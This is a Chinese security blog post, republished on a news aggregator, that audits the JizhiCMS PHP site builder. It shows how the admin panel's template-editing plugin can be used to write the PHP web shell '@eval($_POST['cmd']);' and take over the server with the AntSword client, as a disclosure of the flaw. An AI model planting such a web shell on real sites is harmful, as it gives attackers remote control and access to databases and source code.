Redian新闻
>
极致CMS建站系统代码审计之旅

极致CMS建站系统代码审计之旅

科技


0x001 前言

标题为什么是代码审计之旅呢?相信很多人都有疑问,由于疫情原因居家办公了,暂时回不去,也为政府的防疫速度点赞,大路小路迅速封堵安排人员值守,我们为此还建了个群,半夜各个路口都有人员轮流值守,估计连个鸟都飞不出去,只能老老实实呆在家里了,然后在家做了这个极致cms代码审计过程,拿出来和大家分享一下我的分析过程。



一款免费开源的PHP建站CMS系统,可以免授权商业使用该系统,支持后台在线模板,可以下载和更新模板,提供更多免费模板,支持后台多语言本地化配置,更新一套精美模板免费使用,桌面配置更具人性化设定,支持更多图标选择及菜单名称自定义,更具通俗化目录结构,让你一目了然字段重构,前台发布表单字段设定,列表字段控制,多种类型字段让你自由发挥创作!后台增加模板自定义方式,让你二开更方便!后台插件模板接口开放设定,可以自由维护自己的客户进行客制化服务!免费开源,代码无任何加密,可免费商用,前台界面可以去除版权显示,支持MIT协议,真正开源免费!

0x002 安装环境

  • jizhicms的开发语言是PHP,支持PHP5.6+,发布之日起就已经兼容到PHP7.4版本,推荐使用PHP7.0版本以上。

  • 安装环境建议Linux服务器,当然Windows也是可以安装的,云服务器建议安装宝塔面板查看

  • 无论是Windows还是Linux建议安装Apache、mysql、phpMyAdmin配件

  • 本系统当前版本2.0仅支持mysql数据库


0x003 安装须知

  • PHP5.6+

  • MySQL4.8+,数据编码 utf-8 或者 utf8-general-ci

  • 部署环境必须支持伪静态

  • 支持Apache、Linux

0x004 开始安装

本地环境搭建:

官网下载:https://www.jizhicms.cn/forum.php?mod=viewthread&tid=578

这个cms目录架构大致如下:



安装完以后,前台效果



此时登录后台程序:

地址如下:http://jizhi.com/admin.php/Login/index.html



登陆后效果



收集了一些cnvd的信息,JIZHICMS跨站脚本漏洞,JIZHICMS跨站脚本漏洞,jizhicms1.4版本存在文件上传漏洞,jizhicms存在文件上传漏洞 ,JIZHICMS跨站请求伪造漏洞这几个漏洞,前台一顿操作也没找出漏洞来,那我就去看下后台,根据功能点来,一点点尝试。


想着在系统设置中的高级设置,可以选择上传的后缀名,不过这里是前台的上传文件限制,后台虽然有上传点但是一直绕过不了,比较麻烦,突然想到他还有个插件功能,他有插件可不可以通过插件做一些文章。



浏览了一下插件发现有在线编辑模板,然后感觉看到了希望。

然后点击下载以后点击安装



点击开启以后点击配置密码



配置完密码,再次输入配置的密码登录,点击立即提交就会出来一个新的窗口,可以编辑文件。



添加恶意代码:

@eval($_POST['cmd']);

保存成功后保存完以后

使用蚁剑链接木马,获得服务器权限:



项目所有文件信息:



查看数据配置信息:



至此,通过系统后台编辑文件插件,通过更改文件代码,实现写入木马程序执行,拿到了服务器全部权限、源码,以及数据库信息,造成了很严重的后果。

0x005 总结

该漏洞主要是通过cms 后台扩展管理插件列表,下载在线编辑模板,允许用户修改代码,而这对操作修改代码没有过滤就造成了巨大的风险,拿到了服务器全部权限、源码,以及数据库信息

E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章370余篇,自研平台达到26个,目有15个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
别人只能卖20元,他却能卖到5000元!这个近100年不起眼的生意,一个四川人把它干到极致!卡戴珊的 SKIMS 和苹果一样成为「全球百大」,且不再依赖 Ye 式审美?扯这么多瞎话还不是被她一眼看穿…聪明才是极致性感!著名‘Jiro Dreams of Sushi厨师下个月将在比弗利山庄快闪营业马斯克为什么这么牛?把这一件事干到极致!统计之都云讲堂第四讲回顾 | 杨灿:使用全基因组汇总统计数据加强因果推断快查查看!麻州审计局34亿美元待认领,随手一查,居然真有自己没领的钱!聊一款极致纤薄的顶级电脑也谈改姓。。。我的姓。。[电脑] 桌面上PC的另一种极致【今晚七点】统计之都云讲堂第五讲 | 袁凡:探索定西市的 Sci-Hub 流量之谜顶流女神翻车?极致的脸蛋和身材,全是诈骗告别豪华车专属,覆盖15万以内车型,极致性价比NOA是怎么打造的?突破百万亿参数规模,追求极致的效率和性价比:华人团队开源首个异构并行推荐系统训练框架Persia"战争"游戏中的轴心国作用和启示MSCI“领导者级”评分!复星何以攀上ESG高峰乔治城大学2027届本科生独立申请系统已开放!盘点使用自己申请系统的院校!跑鞋,一个极致内卷的赛道50元在海底捞点「满汉全席」,三斤大鱼大肉吃到撑,极致性价比!乌克兰战争的思考(3):美国促成的战争QS最新排名!英国 QS建筑学专业 TOP5详解活久见!上市公司伪造审计报告被发现,竟说是被审计师陷害?真相是…【微报告】低代码/零代码平台应用实践与趋势研究:制造业篇 | 甲子光年xyhcms 代码审计之模板注入丧心病狂、人神共愤(图)时隔两年Palms酒店终于重开! 米其林早茶回归 &烤肉牛排威士忌开源ClickHouse是如何成为极致弹性的云原生数据仓库的?家长拒绝破窗救车内幼童:应把孩子的命放在精明算计之上|自由谈极致的卖水人 : 10年38倍涨幅,100%毛利率,诡异长牛的美国地主世界第一脱衣舞娘绝美亮相!极致性感迷惨无数人,狠甩巨星渣前夫气场超强美研录取分享 | 卷到极致的CS,他如何拿下TOP1的CMU录取?(文末选校福利)KIT 50 | 卡梅CS硕士录取:卷到极致的CS,他如何拿下TOP1的CMU录取?四大审计、GPA 3.0,放弃凹造型的我反败为胜了 |In @ Ross、LBS铁链女: 我想为你献一朵花!物联网安全审计工具集锦 | Linux 中国
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。